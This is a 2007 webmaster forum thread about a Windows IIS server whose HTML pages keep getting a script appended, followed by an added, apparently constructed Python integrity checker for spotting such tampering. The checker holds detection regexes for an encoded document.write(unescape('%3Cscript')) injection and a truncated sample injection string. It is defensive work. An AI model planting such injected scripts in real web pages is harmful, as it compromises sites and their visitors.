Webmaster Forum

#1 (permalink)
10-14-2007, 08:06 PM
gibsongk55 (Junior Member)
malicious code inserted on all html pages on all domains

Hi,

Am new here. I am running a Windows IIS server and I have been getting some script code added to the end of each HTML page on all domains I am running. Most of the time the code is the same. I was running phpBB forums and suspect the virus came from there, but I am not sure. I contacted the support forum for the phpBB community and they said they would look into the security part of the code, but I never got a response from them. So I deleted the databases for those forums and FTP'd the pages on all sites again, only to find after a week that all domains and pages are infected again. Below is the script code I am finding. I changed the script tag just in case <>

Any help would be appreciated.

Thanks,

Gibs

#2 (permalink)
10-15-2007, 07:30 AM
ALL (Senior Member)

Well, I am not sure, but I can tell you that if you are getting a virus or whatever from this, I don't believe you posted the complete data, because either there is a major bug in phpBB dealing with the page data being in the JavaScript (which shouldn't happen) or there is more to it.

It seems funny that there is <!--[Q]-->...<!--[/Q]-->, which suggests either IE is executing &lt;!--[Q]--&gt;...&lt;!--[/Q]--&gt; or for some reason phpBB is not escaping it.

You are not allowing HTML code in your posts, are you? Because if you are, that is probably your problem.
Reply With Quote
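
An added example, not part of either post: a minimal integrity check for the situation described in the thread, where freshly uploaded pages were found modified again a week later. It records a SHA-256 baseline right after a clean upload, then reports every page that changed and why it looks tampered with. The function names, the three heuristics and the sample site are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics (assumptions): the marker pair quoted in the thread, and a
# percent-encoded <script> written out through document.write(unescape(...)).
MARKER = re.compile(r"<!--\[Q\]-->", re.I)
ENCODED_WRITE = re.compile(r"document\.write\(\s*unescape\(\s*[\"']%3Cscript", re.I)
HTML_END = re.compile(r"</html\s*>", re.I)

def scan_html(text):
    """Return the reasons a page looks tampered with (empty list if none)."""
    reasons = []
    if MARKER.search(text):
        reasons.append("q-marker")
    if ENCODED_WRITE.search(text):
        reasons.append("encoded-document-write")
    ends = list(HTML_END.finditer(text))
    if ends and text[ends[-1].end():].strip():
        reasons.append("content-after-html-end")
    return reasons

def build_manifest(root):
    """SHA-256 of every .htm/.html file, taken right after a clean upload."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.htm*")) if p.is_file()}

def audit(root, manifest):
    """Map each changed or new page to the reasons scan_html gives for it."""
    root, report = Path(root), {}
    for rel, digest in build_manifest(root).items():
        if manifest.get(rel) != digest:
            text = (root / rel).read_text(errors="replace")
            report[rel] = scan_html(text) or ["changed"]
    return report

def demo():
    """Constructed sample: two clean pages, then one gets a script appended."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        page = "<html><body>hello</body></html>\n"
        (site / "index.html").write_text(page)
        (site / "about.html").write_text(page)
        baseline = build_manifest(site)
        injected = '<!--[Q]--><script>document.write(unescape("%3Cscript%3E..."))</script><!--[/Q]-->'
        (site / "index.html").write_text(page + injected)
        return audit(site, baseline)
```

Keep the baseline manifest off the web server; the modification time of the first changed file narrows down which IIS and FTP log entries to review.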